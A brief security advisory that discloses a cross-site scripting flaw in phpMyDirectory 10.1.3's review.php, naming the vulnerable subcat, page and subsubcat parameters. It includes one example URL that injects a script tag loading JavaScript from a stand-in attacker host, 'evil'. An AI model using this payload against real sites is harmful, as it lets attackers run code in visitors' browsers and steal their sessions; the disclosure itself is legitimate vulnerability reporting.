Talte Security Advisory #3 Product: phpMyDirectory 10.1.3-rel Homepage: http://www.phpmydirectory.com/ Risk: low Type: Cross Site Scripting Bug Found by: "Talte Security - mircia" phpMyDirectory is a multi-purpose script, this script can be successfully implemented for Proffesional Yellow pages, books library, friend finder etc. A cross site scripting problem exists in subcat,page,subsubcat variables. Examples: http://localhost/review.php?id=1&cat=&subcat=";><script src=http://evil/foo.js></script> Everything in foo.js gets executed // Best Regrads - Talte security, mircia
